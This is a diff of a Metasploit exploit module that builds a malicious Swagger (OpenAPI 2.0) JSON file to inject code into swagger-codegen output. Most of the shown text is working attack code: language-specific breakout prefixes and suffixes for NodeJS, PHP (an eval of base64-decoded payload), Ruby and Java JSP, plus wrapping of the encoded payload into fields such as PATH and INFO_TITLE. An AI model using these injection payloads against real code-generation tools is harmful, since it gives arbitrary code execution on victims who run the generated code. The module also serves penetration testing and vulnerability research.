@@ -24,14 +24,16 @@ def initialize(info = {})
2424 super ( update_info ( info ,
2525 'Name' => 'JSON Swagger CodeGen Parameter Injector' ,
2626 'Description' => %q{
27- This module generates a Open API Specification 2.0 (Swagger) compliant json
28- document that includes payload insertion points in parameters.
27+ This module generates a Open API Specification 2.0 (Swagger) compliant
28+ json document that includes payload insertion points in parameters.
2929
30- In order for the payload to be executed, an attacker must convince someone to
31- generate code from a specially modified swagger.json file within a vulnerable swagger-codgen
32- appliance/container/api/service, and then to execute that generated code (or include it into
33- software which will later be executed by another victim). By doing so, an attacker can execute
34- arbitrary code as the victim user. (The same vulnerability exists in the YAML format)
30+ In order for the payload to be executed, an attacker must convince
31+ someone to generate code from a specially modified swagger.json file
32+ within a vulnerable swagger-codgen appliance/container/api/service,
33+ and then to execute that generated code (or include it into software
34+ which will later be executed by another victim). By doing so, an
35+ attacker can execute arbitrary code as the victim user. The same
36+ vulnerability exists in the YAML format.
3537 } ,
3638 'License' => MSF_LICENSE ,
3739 'Author' =>
@@ -45,22 +47,19 @@ def initialize(info = {})
4547 ] ,
4648 'Platform' => %w{ nodejs php java ruby } ,
4749 'Arch' => [ ARCH_NODEJS , ARCH_PHP , ARCH_JAVA , ARCH_RUBY ] ,
48- 'Targets' => [
49- [ 'NodeJS' , { 'Platform' => 'nodejs' , 'Arch' => ARCH_NODEJS } ] ,
50- [ 'PHP' , { 'Platform' => 'php' , 'Arch' => ARCH_PHP } ] ,
51- [ 'Java' , { 'Platform' => 'java' , 'Arch' => ARCH_JAVA } ] ,
52- [ 'Ruby' , { 'Platform' => 'ruby' , 'Arch' => ARCH_RUBY } ]
50+ 'Targets' =>
51+ [
52+ [ 'NodeJS' , { 'Platform' => 'nodejs' , 'Arch' => ARCH_NODEJS } ] ,
53+ [ 'PHP' , { 'Platform' => 'php' , 'Arch' => ARCH_PHP } ] ,
54+ [ 'Java JSP' , { 'Platform' => 'unix' , 'Arch' => ARCH_JAVA } ] ,
55+ [ 'Ruby' , { 'Platform' => 'ruby' , 'Arch' => ARCH_RUBY } ]
5356 ] ,
5457 'DisclosureDate' => 'Jun 23 2016' ,
5558 'DefaultTarget' => 0 ) )
5659
5760 register_options (
5861 [
5962 OptString . new ( 'FILENAME' , [ false , 'The file to write.' , 'msf-swagger.json' ] ) ,
60- OptAddress . new ( 'LHOST' , [ true , 'Server IP or hostname that the swagger codegen will callback to.' ] ) ,
61- OptPort . new ( 'LPORT' , [ true , 'Server port.' ] ) ,
62- OptString . new ( 'PAYLOAD_PREFIX' , [ false , 'Payload Injection prefix' , '' ] ) ,
63- OptString . new ( 'PAYLOAD_SUFFIX' , [ false , 'Payload Injection suffix' , '' ] ) ,
6463 OptString . new ( 'INFO_DESCRIPTION' , [ true , 'Swagger info description' , 'A' ] ) ,
6564 OptString . new ( 'INFO_VERSION' , [ true , 'Swagger info version.' , '1.0.0' ] ) ,
6665 OptString . new ( 'INFO_TITLE' , [ true , 'Swagger info title.' , 'C' ] ) ,
@@ -126,45 +125,37 @@ def swagger
126125 end
127126
128127 def exploit
129- if datastore [ 'PAYLOAD' ]
130- case payload . arch [ 0 ]
131- when 'nodejs'
132- payload_loc = 'PATH'
133- payload_prefix = "/a');};};return exports;}));"
134- payload_suffix = "(function(){}(this,function(){a=function(){b=function(){new Array('"
135- wrapped_payload = payload_prefix +
136- payload . encoded +
137- payload_suffix
138- datastore [ payload_loc ] = wrapped_payload . gsub ( /"/ , '\\"' )
139- when 'php'
140- payload_loc = 'INFO_DESCRIPTION'
141- payload_prefix = "*/ namespace foobar; eval(base64_decode('"
142- payload_suffix = "')); /*"
143- wrapped_payload = payload_prefix +
144- Base64 . strict_encode64 ( payload . encoded ) +
145- payload_suffix
146- datastore [ payload_loc ] = wrapped_payload
147- when 'ruby'
148- payload_loc = 'INFO_TITLE'
149- payload_prefix = "=end "
150- payload_suffix = "=begin "
151- wrapped_payload = payload_prefix +
152- payload . encoded +
153- payload_suffix
154- datastore [ payload_loc ] = wrapped_payload
155- when 'java'
156- payload_loc = 'PATH'
157- payload_prefix = %q{a\\\"; "}
158- p = payload . encoded . gsub ( /<%@page import="/ , 'import ' )
159- p = p . gsub ( /\" %>/ , ';' ) . gsub ( /<%/ , '' ) . gsub ( /%>/ , '' )
160- p = p . gsub ( /"/ , '\\"' ) . gsub ( /\n / , ' ' )
161- wrapped_payload = datastore [ 'PAYLOAD_PREFIX' ] + p
162- datastore [ payload_loc ] = wrapped_payload
163- end
128+ case payload . arch [ 0 ]
129+ when 'nodejs'
130+ payload_loc = 'PATH'
131+ payload_prefix = "/a');};};return exports;}));"
132+ payload_suffix = "(function(){}(this,function(){a=function(){b=function(){new Array('"
133+ wrapped_payload = payload_prefix + payload . encoded + payload_suffix
134+ when 'php'
135+ payload_loc = 'INFO_DESCRIPTION'
136+ payload_prefix = "*/ namespace foobar; eval(base64_decode('"
137+ payload_suffix = "')); /*"
138+ wrapped_payload = payload_prefix +
139+ Base64 . strict_encode64 ( payload . encoded ) +
140+ payload_suffix
141+ when 'ruby'
142+ payload_loc = 'INFO_TITLE'
143+ payload_prefix = "=end "
144+ payload_suffix = "=begin "
145+ wrapped_payload = payload_prefix + payload . encoded + payload_suffix
146+ when 'java'
147+ payload_loc = 'PATH'
148+ payload_prefix = %q{a\\\"; "}
149+ p = payload . encoded . gsub ( /<%@page import="/ , 'import ' )
150+ p = p . gsub ( /\" %>/ , ';' ) . gsub ( /<%/ , '' ) . gsub ( /%>/ , '' )
151+ p = p . gsub ( /"/ , '\\"' ) . gsub ( /\n / , ' ' )
152+ wrapped_payload = payload_prefix + p
164153 else
165- print_error ( "No payload defined!" )
154+ raise IncompatiblePayloadError . new ( datastore [ 'PAYLOAD' ] )
166155 end
167156
157+ datastore [ payload_loc ] = wrapped_payload
158+
168159 print_status swagger
169160 file_create swagger
170161 end
0 commit comments